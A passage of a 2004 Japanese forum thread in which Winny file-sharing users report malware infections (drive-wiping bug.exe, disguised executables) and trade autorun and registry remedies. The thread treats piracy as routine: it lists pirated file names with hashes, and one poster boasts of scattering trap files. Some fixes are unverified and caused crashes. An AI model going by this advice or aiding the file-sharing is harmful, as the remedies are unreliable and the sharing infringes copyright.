 中の実行ファイル(setup.exe)をアンチウイルスソフトでチェックする。
・フォルダアイコン、txtアイコンを変更 (他の拡張子も変更が望ましい。avi,ヘルプアイコンのウイルスあり)

665 :[名無し]さん(bin+cue).rar:04/02/25 20:07 ID:Q5e8Fas5
・拡張子「.folder」で悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり。
 http://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
 対策は↓
 スタートメニューのファイル名を指定して実行に「regedit」と入れOKを押す。
 左側のツリーの「HKEY_CLASSES_ROOT\.Folder」
 この.Folderを右クリックして削除&再起動。
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限
 ただしインストーラで弊害が起こることもある
・CD/DVDの自動実行はオフ。
各OSでのやり方は↓。また窓の手・窓の友などで簡単にオフに出来る。[必須]
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャー]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000の場合
  1.[スタート]−[ファイル名を指定して実行] から regedit を起動
  2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
 ◆WinXPの場合
  1.エクスプローラで CD-ROM ドライブを右クリックして [プロパティ] をクリック
  2.[自動再生] タブをクリックし、ドロップダウンリストで「音楽 CD」を選択
  3.「実行する動作を選択」にチェックし、「何もしない」を選択して「OK」をクリック
※DaemonToolの自動起動をオフにしても意味は無い

・新種ハケーンしたらここでサンプル提出しる
 http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949

666 :[名無し]さん(bin+cue).rar:04/02/25 20:08 ID:q7s27UiJ
Fate/stay nightを解凍後、
マウントしてみたらインスコ画面が出ると同時に懐かしのRPGのセーブデータ破損の音楽が。
そして画面上部から赤くなっていったと思ったらデータが消えていった。

復旧無理だよなぁ・・・

667 :[名無し]さん(bin+cue).rar:04/02/25 20:09 ID:Q5e8Fas5
新しい報告や対策があったのでまとめてみますた

668 :[名無し]さん(bin+cue).rar:04/02/25 20:22 ID:fjZ3tgcK
>>666
あのBGMが鳴ってもとりあえず電源を切って
カートリッジを掃除して接触不良をなくしてから電源を入れると
データが復活してることあるよ。
消えた瞬間にあきらめてはいけない。

というか、あのBGMが流れるってことは
消えたっていう記録が残ってるのはどういうことだと小一時間(ry
本当にどうしようもないときはあんなBGMなしで、ただ記録が何もない…
あんまりにもさみしすぎるので、なんか鳴ってくれ。

669 :[名無し]さん(bin+cue).rar:04/02/25 20:35 ID:ev71TQR+
製作者が狙ってセーブ消去もプログラムのうちにしたのん?

670 :[名無し]さん(bin+cue).rar:04/02/25 21:09 ID:qUmqzA7y
「WINNYで違法ファイル集めてます」はその後どうなった?
ほかに感染してる人いますか?
ノートン対応してくれないのかな・・・

671 :[名無し]さん(bin+cue).rar:04/02/25 21:26 ID:bkvxKKoo
>スタートメニューのファイル名を指定して実行に「regedit」と入れOKを押す。
 左側のツリーの「HKEY_CLASSES_ROOT\.Folder」
 この.Folderを右クリックして削除&再起動。
上を実行したら>>567になってしまうんだけど、解決策ありますかね?
レジストリいじったのがまずかったのかな・・・。
ちなみに>>568をやっても無理でつた。

672 :[名無し]さん(bin+cue).rar:04/02/25 21:36 ID:R8DI2F+8
俺、こういう↓書き込みするやつ許せないよ。こんなもの使われたんじゃせっかくトラップファイルばら撒いても意味ない・・・

http://tmp2.2ch.net/test/read.cgi/download/1075567845/186

186 名前:040130物の違法物確定報告 投稿日:04/02/05 03:40 ID:qhGTElQJ
040206物出回るかって時期なんだが、先週物の違法確定報告w

(18禁ゲーム) [040130] カスタム隷奴IIDVD 初回限定版 (iso+rr) [kiss].part1.rar 0dipaNG24v 734,003,200 5caf64f5a6f6431e4eb6a0fdd959f094
(18禁ゲーム) [040130] カスタム隷奴IIDVD 初回限定版 (iso+rr) [kiss].part2.rar 0dipaNG24v 734,003,200 bb734bb78ee0c21f8da2ec8d59e939e1
(18禁ゲーム) [040130] カスタム隷奴IIDVD 初回限定版 (iso+rr) [kiss].part3.rar 0dipaNG24v 51,788,222 464df2f639fd069cf0c3d685ecf6840a

今の所今週物はリネーム捏造だけみたいやね、発見報告もいいけど、先頭ヘッダ見て確認してから此処に書き込んで欲しいもんだ
>185 みたいな突っ込み受けなくて済むし、無駄にスレ消費しないしね

>170
俺はこっちを落として使ってる
(アプリ)Virtual PC v5.2 for Windows(動確済).rar bRQgEzWCsS 44,419,318 6d3158085f5df035bd1a8a9b1e394c7c

でも5.2にUpDateせずに5.1のままw
5.1でも不便無いしホント助かってるよ、今までHDD全消し当たった事無いけどレジストリ汚さなくて済むし
9x系しか駄目なエロゲを動かすのに使ってる、たまにサウンド関連で不具合出す時もあるけど



673 :[名無し]さん(bin+cue).rar:04/02/25 21:41 ID:nZ2EwnFc
ORANGE RANGE - ミチシルベ〜a road home〜
の中に付録.txtってアプリが、あるんだけど、これ何?
ノートンは反応なしでした。

674 :[名無し]さん(bin+cue).rar:04/02/25 21:52 ID:ACFI5BVT
わはははは!
やられた(w
幸いというかなんと言うか、ろくなデータの入ってないドライブだけですんだけど、
きれいサッパリファイルを削除されたよ。

うむ、いまさらバッチファイルのトラップに引っかかるとは思わなかった。
たしかに、緊張感が足りないよなぁ。

・・・しかし。

・・・消えたドライブに何が入っていたか覚えていない罠。
ろくでもないファイルばっかりだったのは確かだけど、重要なファイルは
ホントに無かったよな・・・?

675 :[名無し]さん(bin+cue).rar:04/02/25 22:07 ID:9n+WoflO
>>673
txtはアプリじゃないだろ。
歌詞カードじゃないの?

676 :666:04/02/25 22:09 ID:q7s27UiJ
マウントと同時にbug.exeだかなんだかが起動。
某RPGの音と共に、モニターの上部から赤い色に染まっていく。
どうやら同時にDドライブの消去も行われたらしい。

即座にタスクマネージャからbug0exeを終了後。
HDD全部さらって>>549と同様のファイルを削除。
結果、被害は30GB相当。

その後、再起動しても何も起こらないところから、これで解決かと思ってるのだけど。
他に何かしておかなければならないことって何があります?


677 :673:04/02/25 22:23 ID:Q3VPsxDa
トロイの木馬がsvchost.exeが、ありました。

678 :[名無し]さん(bin+cue).rar:04/02/25 22:36 ID:kpF2tIZs
再インストールすれば
消えたんなら同じでしょ
そんなPC使えないよ
俺なら

679 :671:04/02/25 22:45 ID:bkvxKKoo
システムの復元で自己解決しますた。( ´∀`)
強制落ちが3回も続いたときは顔面真っ青・・・。・゜・(ノД`)・゜・
どうもスレ汚しスマソ。

680 :[名無し]さん(bin+cue).rar:04/02/25 22:49 ID:rBNKq8ic
自分がデジカメで撮った画が入ってるPCで
よく怪しげなファイル実行する気になるなぁ。
おれにはそんな覚悟できないわ・・・

681 :[名無し]さん(bin+cue).rar:04/02/25 22:54 ID:ev71TQR+
whiter対策としてC:\Windows\Systemに「Whismng.exe」というダミーファイルを作る

というのは、フォルダだけ作ればいいんですよね?Whismng.exe←これexeファイルじゃないですよね?
後、拡張子のアイコン変更はどうやるんですか?
>・フォルダアイコン、txtアイコンを変更 (他の拡張子も変更が望ましい。avi,ヘルプアイコンのウイルスあり)
↑ってどういう意味ですか?txtファイルはノートパッド開かれるんですが、
見た目とかプロパティでワードパッドとかにして変えろってことでしょうか?
aviヘルプアイコンのウィルスってのは○のなかに?マークがついてるアイコンのことですか?
たまに、拡張子とアイコン偽装してて見た目完全に.txtなのにクリックしたとたんexeファイルにはや変わり
みたいなのはどうやって見分けたらいいでしょうか?極窓とかで開いたらだいたいわかりますか?

682 :[名無し]さん(bin+cue).rar:04/02/25 22:57 ID:kpF2tIZs
>>679
わらたw
良くそんな2chの情報なんかで実行できるよなww
俺もやってみたけど
削除じゃなくて文字を追加して無効にしただけだけどね
何かあったときにすぐ元通りに出来るように
してからやるだろ普通!
削除なんかしねーよww

683 :[名無し]さん(bin+cue).rar:04/02/25 23:04 ID:94imJ3ZG
>>681
藻前にはnyは早すぎる。

684 :[名無し]さん(bin+cue).rar:04/02/25 23:42 ID:2GAB+4Ra
>>681
藻前みたいな真鍮がウィルス拡散してるのね。。

685 :[名無し]さん(bin+cue).rar:04/02/25 23:45 ID:rlhXu15r
そ、そ、そ、そんな、エサにつつ、つら、つられ

686 :[名無し]さん(bin+cue).rar:04/02/25 23:46 ID:81qtyOYx
ぬるぽキター

687 :[名無し]さん(bin+cue).rar:04/02/25 23:52 ID:bltKI6/t
マウントしたらHD消されるやつって
自動再生オフにするだけで防げるの?
HD全消しはさすがに怖すぎなので・・

688 :[名無し]さん(bin+cue).rar:04/02/25 23:55 ID:XCHnD7f+
>>687
un

689 :[名無し]さん(bin+cue).rar:04/02/26 00:08 ID:EOOl5Yxg
>>687
whiterはとりあえず発動しないけど
中身を確認しないで実行すれば結果は一緒だーよ

690 :[名無し]さん(bin+cue).rar:04/02/26 00:36 ID:pAs69iVd
>>687
デーモンじゃ自動起動オフにできないからCD/DVDに焼いて確認すればいいの?

691 :[名無し]さん(bin+cue).rar:04/02/26 00:42 ID:zrbGZFJ8
>>690
?(゚Д゚≡゚Д゚)?

692 :[名無し]さん(bin+cue).rar:04/02/26 00:43 ID:9fdScas7
CD-ROMからの自動スタート(AutoRun)しないようにする

値の更新
キー HKEY_LOCAL_MACHINE\\SYSTEM\CurrentControlSet\Services\Cdrom
値の名前 Autorun

値のタイプ REG_DWORD
値 0
備考 デフォルトは1です。


693 :[名無し]さん(bin+cue).rar:04/02/26 00:44 ID:8SxeD3e9
>>690
初心者は足洗った方が身のためだと思うがとりあえず >>6

694 :[名無し]さん(bin+cue).rar:04/02/26 00:56 ID:RNnwflit
whiterにやられますた。あとからこのスレ見ました。
意味ねぇ

695 :[名無し]さん(bin+cue).rar:04/02/26 02:06 ID:2CM3owVu
はぁ…やっと復旧作業が終わったよ…
なんかいつのまにか感染してたよ・゜・(ノД`)・゜・


696 :[名無し]さん(bin+cue).rar:04/02/26 02:10 ID:9uQmJvPv
>>638
>.jpgに偽装したトロイ
アイコンはともかく、拡張子をjpgとかaviとかmp3に偽装することは出来ません。
仮に拡張子がjpg等になっていても、それは"偽装"ではなく、単に"変更"しているだけです。
ダブルクリックしてもプレーヤとかビューワが「開けない」と言う旨のメッセージを出すだけです。

>>681
>たまに、拡張子とアイコン偽装してて見た目完全に.txtなのにクリックしたとたんexeファイルにはや変わり
皮肉るわけじゃないですけど、本当にそんなウイルスがあったら、ぜひともお目にかかりたい。

697 :[名無し]さん(bin+cue).rar:04/02/26 02:10 ID:uBDV5qrZ
ノーd先生がBloodhound.Packed と
表示を出すファイルがあるんだが、新種なんでしょうか?
trojan.killfilesに感染している、
ファイルと同じファイルみたいなんですが・・・。
trojan.killfilesの亜種??


698 :[名無し]さん(bin+cue).rar:04/02/26 02:20 ID:9uQmJvPv
>>697
ノートンは怪しいプログラム、つまり未知のウイルスと思われるファイルを発見した場合、「Bloodhound」がついた名前を表示します。
よって、少なくとも正規のプログラムではないと思います。


699 :[名無し]さん(bin+cue).rar:04/02/26 02:27 ID:uBDV5qrZ
>>698
では、少なくとも、純正の
trojan.killfilesではないという事ですね。

一応、symantecに提出しときまつ。

700 :[名無し]さん(bin+cue).rar:04/02/26 04:16 ID:/c4U+V+J
ファイルにウィルスとか入れる香具師の神経がわからん。
こういう嫌がらせは止めてもらいたいよ。
あと駅前に置いてた自転車のカゴに空き缶とかチラシ入れるのもけしからん。
自分がやられたらいやなことを他人にする香具師はあほだ。

701 :[名無し]さん(bin+cue).rar:04/02/26 04:31 ID:fTi8mcxw
>>700
たぶんむこうも、ただでソフト手に入れようとするな!って思ってる。

702 :[名無し]さん(bin+cue).rar:04/02/26 04:51 ID:rdapYoXa
本来自分に使う権利の無いものを使うことによって、他人の利益を侵害するヤツ。
大勢の通行人の迷惑も顧みず、駅前に自転車を置いておくヤツの神経がわからん。
自分がやられたらいやなことを他人にする香具師はあほだ。

703 :[名無し]さん(bin+cue).rar:04/02/26 05:17 ID:0nV70sH/
キモ

704 :[名無し]さん(bin+cue).rar:04/02/26 06:42 ID:RAbYUnKY
>>701
いや、むしろ、nortonの必要性が増すことをよろこんです。

705 :[名無し]さん(bin+cue).rar:04/02/26 08:54 ID:70VfrfZe
タハー( ´,_ゝ`)<ウイルス沢山

706 :[名無し]さん(bin+cue).rar:04/02/26 09:27 ID:HIl83Hzl
ウィルスに引っ掛かる椰子ってある意味オイシイよな・・・

707 :[名無し]さん(bin+cue).rar:04/02/26 09:52 ID:CZfFhgVl
なんか「〜.txt.exe」踏んじまったら、nyのUPフォルダにダウンフォルダが勝手に追加されるようになっちまったんだけど、これって何ですかね?
脳トン先生シカトだよ。


708 :[名無し]さん(bin+cue).rar:04/02/26 10:31 ID:+z0PhXKk
ノートンを過信するなと何度(ry

・新種ハケーンしたらここでサンプル提出しる
 http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949

709 :[名無し]さん(bin+cue).rar:04/02/26 10:54 ID:G6wsWIuN
>707
バックドアを仕掛けられてる可能性あり。
怪しいsvhost.exeがないか、ウィルススキャンしたほうがいいかもよ。

710 :[名無し]さん(bin+cue).rar:04/02/26 11:36 ID:GwP0gVO0
nyフォルダにこんなんできてたけどなに?
(null)BbsNoderef.txt
(null)Noderef.txt

711 :[名無し]さん(bin+cue).rar:04/02/26 11:46 ID:BIJ5J9Wa
>710

高負荷になると作成されることがあるらしい

ウイルスやワームが活動した結果高負荷になったのかもしれないし
Winnyしながら別のソフトを使った結果高負荷になったのかもしれない
後者ならウイルスやワームとは無縁の話

何にしろ自分の設定や使い方を見直して下さい



712 :710:04/02/26 11:51 ID:GwP0gVO0
あと〜秒でシャットダウンとかいうのでてキタ━━(°Д°)━━!!!!
これってウイルスですよね?

713 :[名無し]さん(bin+cue).rar:04/02/26 12:03 ID:GSEkRQhq
うん
100割方ウイルス

714 :[名無し]さん(bin+cue).rar:04/02/26 12:25 ID:0nV70sH/
>>712
プラスター!

715 :[名無し]さん(bin+cue).rar:04/02/26 12:32 ID:+z0PhXKk
今時?だったらとっくの昔に感染してると思うが。
新規でOSインストールしたとか、おNEWのPCだとか


716 :[名無し]さん(bin+cue).rar:04/02/26 12:41 ID:Umdf5/4n
>>700
困る人が誰かを考えれば
おのずと犯人像は出てくるんじゃないの?

717 :[名無し]さん(bin+cue).rar:04/02/26 13:13 ID:DAFbjJm/
>>666と同じ状況になって慌てて電源をポチっと消した
んで起動しなおしたらもとに戻ったけどこれって大丈夫?


718 :[名無し]さん(bin+cue).rar:04/02/26 13:46 ID:KMXX0rCE
>>672
乙。たすかりんこ。

719 :[名無し]さん(bin+cue).rar:04/02/26 13:47 ID:DAFbjJm/
と思ったら外付HDDの一部が消されてやがる・・
しかも容量の表示は変わらないままだし・・どうすりゃいいんだ?

720 :[名無し]さん(bin+cue).rar:04/02/26 14:12 ID:CTxomeSB
とりあえずカウントダウン始まった場合はPCの日付を一日戻るなりする。
その間に↓のを入れれ
ttp://www.microsoft.com/downloads/details.aspx?FamilyID=0cc30297-d4ae-48e9-acd0-1343d89ccbba&displaylang=ja

721 :[名無し]さん(bin+cue).rar:04/02/26 14:13 ID:rJAILp85
自分も1.14でantinyを拾ってしまったんですが
>358さんと違って(昔の話でスマソ)2.71βの方にも感染してしまいマスタ
両方ともCashは真っ白、うpフォルダが作られ中には
antiny特有のexeとキモヲタのjpgが入ってマス
一応上記の対処法はやってみたのですが別の対処法が必要なんでしょうか?
ガイシュツでしたらスマソ

722 :[名無し]さん(bin+cue).rar:04/02/26 16:20 ID:nTyZVB0w
おいらも>>707と一緒の症状なんだが
怪しいsvhostも見つからん
気味が悪いぞ

723 :[名無し]さん(bin+cue).rar:04/02/26 16:30 ID:Q7CCDBey
ウイルスバスターとか落とした奴っているの?



724 :[名無し]さん(bin+cue).rar:04/02/26 16:46 ID:GSEkRQhq
うん。

725 :[名無し]さん(bin+cue).rar:04/02/26 16:52 ID:dVIeEGSX
大好きな先生にHなおねだりしちゃうおませなボクの/私のぷにぷに

bug.exe

引っかかったよーん
100Gくらい飛んだ

平気だけどねーん。

726 :[名無し]さん(bin+cue).rar:04/02/26 17:00 ID:Oqdejbkk
次からテンプレに、>710-711の事項を入れてみては?

727 :[名無し]さん(bin+cue).rar:04/02/26 17:13 ID:lesBGvKy
はぁ?馬鹿?

728 :[名無し]さん(bin+cue).rar:04/02/26 17:15 ID:70VfrfZe
ブラスター感染したぜ。笑っちゃうよw

729 :[名無し]さん(bin+cue).rar:04/02/26 17:45 ID:e8Kdp0pj
IEが固まったからタスクマネージャ見たらsvchost.exeが4つほどあったけどウイルス?トロイ?
ファイルが壊れたとかキャッシュが消されたとか被害はなんにもないんだけど・・・。

730 :[名無し]さん(bin+cue).rar:04/02/26 17:57 ID:e8Kdp0pj
p://altba.com/bakera/hatomaru.aspx/glossary/0073007600630068006f00730074002e006500780065

なんだ特に被害なければ問題なしか。

731 :[名無し]さん(bin+cue).rar:04/02/26 18:15 ID:G6wsWIuN
svhost.exeって正常なシステムファイルだから、タスクにあっても
いいんだけど、それと偽装してる場合があるから問題。
ググって見るとそれに関するウィルス情報が見れるので
詳しくはそこで。

732 :[名無し]さん(bin+cue).rar:04/02/26 18:42 ID:9Nrqi8oj
(アルバム) (2004.02.25) 玉置成実 - Greeting (Pass不要)

の中のtxtがアイコンがtxtなだけで実はexeファイルでして
何度もクリックしてしまい、不安になりここを見て泣きそうになりました。
が、再起動後もとくに変化が見られない
・・・これってセーフだったんでしょうか?

733 :[名無し]さん(bin+cue).rar:04/02/26 18:57 ID:nGi9nSXv
実は時限式Whiterで明後日あたりに発動するとか

734 :[名無し]さん(bin+cue).rar:04/02/26 18:58 ID:/hx//87F
セーフなわけない
嫌いな結婚したくないブスに中出しして
妊娠しないぐらい確立が低い

735 :[名無し]さん(bin+cue).rar:04/02/26 19:06 ID:9Nrqi8oj
ん〜ノートンでシステム完全スキャンでなにも引っ掛からなかったけど
実行しちゃったらもう対処しようないのでしょうか?

実行して何も起こらないなんて事あるんですか?
再セットアップしても安心できない?

736 :[名無し]さん(bin+cue).rar:04/02/26 19:34 ID:nTyZVB0w
tempフォルダの中に
SVCHOST.EXEなるtxtがあるんだが
1.18MBもあるんだがNortonはひっかからず
これってなに?

737 :[名無し]さん(bin+cue).rar:04/02/26 20:03 ID:SFccvJpV
tempは削除してるけど

738 :[名無し]さん(bin+cue).rar:04/02/26 20:18 ID:QJCTnxWb
>>736
SVC CHAOS の続編

739 :[名無し]さん(bin+cue).rar:04/02/26 21:00 ID:FIokyjXH
>>707 
「マイコンピュータ」のプロパティーみてみな。
使用者が「Winnyで違法ファイル集めてます(^^)v」になってないか?
みんな調べてみ。 

740 :[名無し]さん(bin+cue).rar:04/02/26 21:28 ID:ngBl5pta
eTrustでも感知しないウィルスってある?

741 :[名無し]さん(bin+cue).rar:04/02/26 21:31 ID:26r02bsO
bug.exeに引っ掛かったんだが、
検索してもそれらしいファイルは出てこないし
どうやって処理したらいいのかわからんぽ・・・_| ̄|○
対処法を知っているつわものはおりませぬか

起動のたびに少しずつファイルが消えていく・・・OTL

742 :[名無し]さん(bin+cue).rar:04/02/26 21:35 ID:KMXX0rCE
>>741
とっととデータをサルベージしてOS再インスコだろ
何を嬉しそうに再起動繰り返してんの

743 :[名無し]さん(bin+cue).rar:04/02/26 21:53 ID:FIokyjXH
ウイルスに感染したくらいで再インスコするヤツまだいたの?
ワロタ

744 :741:04/02/26 21:57 ID:26r02bsO
とりあえず、bug.exeと
スタートアップのsetupcfg.bat、setup.batなんかを消したら
直った?様な気はします。
ファイル消えてませんし、コマンドプロンプトも出ないので。

いないとは思いますが、bug.exeに引っかかった人いましたら参考になれば幸いです

自己解決しましたスレ汚しスマソ。

745 :[名無し]さん(bin+cue).rar:04/02/26 21:57 ID:dJJeZlg3
Documents and Settingsの中のスタートアップくらい見ないのか・・・
各ユーザー毎のスタートアップと、各ドライブの最上層ディレクトリ。
その辺にbug.exe・winny.sys・Setup.bat・Setupcfg.batがあるだろうから削除して、
nyのヤッシュも消したらレジストリでも確認してろ。

746 :[名無し]さん(bin+cue).rar:04/02/26 22:15 ID:iVZSBB/s
俺も>>726に賛成だな
同じ質問をしてくるやつが結構いたし

747 :[名無し]さん(bin+cue).rar:04/02/26 22:46 ID:FWQBCXCX
>>725
トリップ付き?出来ればキーワードとハッシュを登録汁
http://nydb.info/
数タイトル流してるトリップ(有名な人?)が安全だと独断だが、
いかがなものか・・・

748 :[名無し]さん(bin+cue).rar:04/02/26 23:03 ID:om1ipv7p
落としたファイルにw32.hllp.handerっていうウイルスがついてました。
一応ノートン先生に処理させようとしたんだけど失敗して困ってます。
毎秒2メガくらい感染したフォルダの容量が増えるんでにっちもさっちもいかないんです。

749 :[名無し]さん(bin+cue).rar:04/02/26 23:16 ID:tWgzsgNw
>>746
>>664-665>>710-711追加ってことで。

750 :[名無し]さん(bin+cue).rar:04/02/26 23:18 ID:KMXX0rCE
>>743
アフォ

751 :[名無し]さん(bin+cue).rar:04/02/26 23:24 ID:SW93/nB9
>>1
anntiny、その他winnyで流れてるウイルスの概要、及び対処方etc
http://nyweb.hp.infoseek.co.jp/

↑踏んだらウイルス反応でたけどだいじょうぶなのか?

752 :[名無し]さん(bin+cue).rar:04/02/26 23:27 ID:SW93/nB9
http://www.symantec.com/region/jp/sarcj/data/j/js.trojan.windowbomb.html

753 :[名無し]さん(bin+cue).rar:04/02/26 23:30 ID:8KJsdtTA
>>741
すげぇ!あんたすげぇよ!!
よくそんなんでnyできるな(笑

引っかかって1パーテーション掃除してもらった私が言うことじゃないが、
「あ、やばそうなファイル実行しちゃった!」ってときは簡単に再起動しちゃ
だめだよ。

少なくとも、スタートアップフォルダとレジストリの自動実行とWin.iniぐらいは
チェックしようぜ。

754 :[名無し]さん(bin+cue).rar:04/02/26 23:55 ID:JGLP91wQ
とりあえず
HD全消去から復活アゲ
再起動あぼ〜んのやつね

755 :[名無し]さん(bin+cue).rar:04/02/27 00:06 ID:NETy3JGs
    __         
  γ ____ヽ丿
   (!_l__))    みなさ〜ん          
   人i! ゚ ‐゚ノlヽ  _
   〔〕)llつ_/ ̄ ̄/ >>743みたいなのがウィルスをばら撒いてますよぉ〜  
     <_:l_> ̄ ̄   
     し'ノ    




756 :[名無し]さん(bin+cue).rar:04/02/27 01:02 ID:S5kM6jJj

winny.exeが勝手にsmtpサーバに繋いでメール送信してるのをウィルスキラーが発見したのですが、これってやばいですか??

いったい何を送信してるんでしょう??
開発とかに必要な情報ならともかく、個人情報とか送ってそうで非常に気になります。

ルータだけで十分かと思ってたけど、怖いのでやっぱファイアウォールソフトも入れることにします。



757 :[名無し]さん(bin+cue).rar:04/02/27 01:03 ID:4CxD10sr
もう、遅いわ!

758 :[名無し]さん(bin+cue).rar:04/02/27 01:37 ID:HlfivaSd
exe厨必死だな

759 :[名無し]さん(bin+cue).rar:04/02/27 01:41 ID:ezPfw7rK
       ∧_∧
     ミ ○<#`∀´>  オラオラ ご安心ください!
      ヽ ∧_ ○))
    ミヘ丿 ∩Д`;) 
    (ヽ_ノゝ _ノ 分りました もう安心しました


760 :お助けください:04/02/27 02:37 ID:tENyY1cA
>>6でCDドライブと仮想CDドライブ(デーモンのやつ)の自動実行をオフにしたにもかかわらずデーモンでファイルをマウントしたとたんにオートランが実行されてしまいます。
OSはWINXPです。
デーモンでマウントしたあとオートランを実行させないようにするにはどうしたらいいのでしょうか


761 :[名無し]さん(bin+cue).rar:04/02/27 02:48 ID:Im9OYvnI
レジ いじれ
あと検索ね

762 :[名無し]さん(bin+cue).rar:04/02/27 02:52 ID:tENyY1cA
>>761 XPでもレジいじらなきゃダメなの?


763 :[名無し]さん(bin+cue).rar:04/02/27 03:03 ID:M8+O5tgo
ここを見て僕にnyは早すぎると思いますた。


764 :[名無し]さん(bin+cue).rar:04/02/27 03:06 ID:QrOnyfB+
ここはじめて見たんだけどこんなのにひっかかるやついるんだね
なによりこんな初心者がnyやってることに驚いた

765 :[名無し]さん(bin+cue).rar:04/02/27 03:12 ID:qAHHs24i
>>747

すまぬ。ハッシュ忘れた。
参照数は結構あったから、かなり出回ってるよ

766 :[名無し]さん(bin+cue).rar:04/02/27 03:16 ID:gkTFJfqP
>>756
動揺している気持ちは分かりますが、ウイルスと思われるファイルを落としたときは、まずハッシュを書いてください。

>>764
雑誌の氾濫が原因ではないかと。

767 :[名無し]さん(bin+cue).rar:04/02/27 03:16 ID:+EIa4FTm
>>764
お前も予備軍だ。
そのうち泣きを見るで。

768 :766:04/02/27 03:24 ID:gkTFJfqP
>>756
一応確認しますが、何かのファイルを実行したらそうなったんですか。
それとも、突然メールが送信されたんですか。


769 :[名無し]さん(bin+cue).rar:04/02/27 03:32 ID:tENyY1cA
レジストリいじってautorunしないようにしたんだけど未だデーモンでマウントした瞬間autorunが実行されてしまう・・なぜじゃぁあああ

770 :[名無し]さん(bin+cue).rar:04/02/27 03:35 ID:Im9OYvnI
一応 いっておくけど デーモン の機能をよく読んでね。
そして レジストリも確認すれば完璧 
あと 過去ログよんでね。




771 :[名無し]さん(bin+cue).rar:04/02/27 03:38 ID:Im9OYvnI
再起動してないと言う オチだったら 拳骨で殴る前になでなでしてあげます。

772 :[名無し]さん(bin+cue).rar:04/02/27 03:44 ID:tENyY1cA
おぉ再起動したらうまくいけた!
おまいらレジストリいじったら再起動ってことだ 覚えとけよ!
テンプレにも再起動って入れとけ!

773 :[名無し]さん(bin+cue).rar:04/02/27 03:47 ID:rJqJ74/C
  ∧ ∧    
 (||。Д゚)ヘ_∧
  (つ´゙(   )
  | 'ヽ、   ノ
  ヾ ィ゙ , O)
   ~"(_)、__)

774 :[名無し]さん(bin+cue).rar:04/02/27 04:12 ID:9XrpQn+F
>>772
氏ねよキモイ。あんた、洗ってない犬の臭いがすんだよ


775 :756:04/02/27 09:22 ID:S5kM6jJj
>>768
特に何かを起動したすぐ後に、ってワケではないんです。

winnyを起動して2〜3時間くらい放置プレイしてて、
何となく画面を見たらウィルスキラーのダイアログメッセージが出てて、
『…\winny\bin\winny.exeが(中略)メールを送信しようとしています。(後略)』
みたいなのを見たんですが、このwinny.exeのパスは本体のものと一致してました。

因みにこのとき他に開いてたウィンドウはエクスプローラやwinampくらいです。

このwinny.exeのメール送信って他に気付いた人いないんでしょうか??


776 :[名無し]さん(bin+cue).rar:04/02/27 10:00 ID:YGUjVC3c
>>775
とりあえずそのウイルスを削除しな。

777 :[名無し]さん(bin+cue).rar:04/02/27 10:11 ID:c1Yo4lEq
383 萌える名無し画像 sage 04/02/23 02:10 ID:6RYC3AkW
winnyやってる人いたら気をつけて!既出かもしれんけど、

【写真集】 チェキッ娘 (下川みくに、藤岡麻美、上田愛美、他) 『Check it!』 (水着 84枚).zip
3528071178260c8dceb9ccf187584ec9

はウィルス入ってるみたいです。

バスター入れててよかった・・・。

384 萌える名無し画像 あげ 04/02/24 00:31 ID:etK3WGA5
保守。

385 萌える名無し画像 04/02/25 02:19 ID:KAA+P4eJ
>>383
それ、持ってるんですがごみ箱に入れたほうがいいでしょうか

386 萌える名無し画像 sage 04/02/25 11:39 ID:L+h2Y2Od
ゴミばこ入れる前に、(・∀・)ゥィルスー!!作動させてみてくれ

387 萌える名無し画像 04/02/26 12:04 ID:WlopYNma
>>386
すでに開いたことありますが
何がどうなってるんでしょうか

388 萌える名無し画像 sage 04/02/27 01:21 ID:XhYsDcWf
>>387
知らない間にあなたのPCの内容が友達や職場などへメールされてます。
今すぐHDDをフォーマットしてWindowsをインストールし直しましょう。

http://wow.bbspink.com/test/read.cgi/girls/1068304523/383-388

778 :[名無し]さん(bin+cue).rar:04/02/27 17:11 ID:aIpeF3uZ
初めて2週間目の初心者です。
デーモンツールの自動起動について質問です。
ウィルス対策の為、自動起動を切りたいのですが、レジストリをいじれば切れるのですが?
あと切れるのであればレジストリでの切り方を教えてください。

779 :[名無し]さん(bin+cue).rar:04/02/27 17:16 ID:Dgh3GLO6
このスレ読めば分かる

780 :[名無し]さん(bin+cue).rar:04/02/27 17:22 ID:z6TuwM1D
例のモノのVersion3が出てきたみたいだな。

今度のはかなりヤバめ。復旧はバックアップからの書き戻しでしか無理そうだ……。

781 :[名無し]さん(bin+cue).rar:04/02/27 17:35 ID:yeXWvkT/
>>780
クワシク

782 :[名無し]さん(bin+cue).rar:04/02/27 17:41 ID:GGUL2q1j
4ff3d557567f444aa3b0f7c6b2f217f4
これなんですが音楽アルバムで拡張子がmp3.zipと二重になってる物はやばいですかね?

783 :[名無し]さん(bin+cue).rar:04/02/27 17:52 ID:mjdySt6t
>>782
やばくない

784 :[名無し]さん(bin+cue).rar:04/02/27 17:58 ID:yeXWvkT/
zip.mp3ならやばくないけど、mp3.zipは…

785 :[名無し]さん(bin+cue).rar:04/02/27 18:33 ID:4uIUoVyV
>>672
このVirtualPCって大丈夫なの?

786 :[名無し]さん(bin+cue).rar:04/02/27 18:37 ID:799MX7xM
>>785
__  ○ __
      __\    |    ∠--──-
    ̄ ̄   ̄/⌒`゙': 、
        /  , -.、  `゙': 、
        〈  i   }     `ヽ.     京            ,ィ⊃  , -- 、
          `ヒゝ-''"二ニニニ=ノ     都   ,r─-、      ,. ' /   ,/     }
         /´ _゙‐- ''" ,. ‐-、. ヽ     府  {     ヽ  / ∠ 、___/    |
       _r‐v ,'"7゙ヽ  / ぐ .i  `,    警  ヽ.      V-─- 、  , ',_ヽ /  ,'
    _/ i .i i F‐ } i ┌ ヽ}  i    ハ    ヽ  ヾ、  ',ニ、 ヽ_/ rュ、 ゙、 /
    /i i  i i,,..!-,┴、こ‐-、/   i    イ     \  l  トこ,!   {`-'}  Y
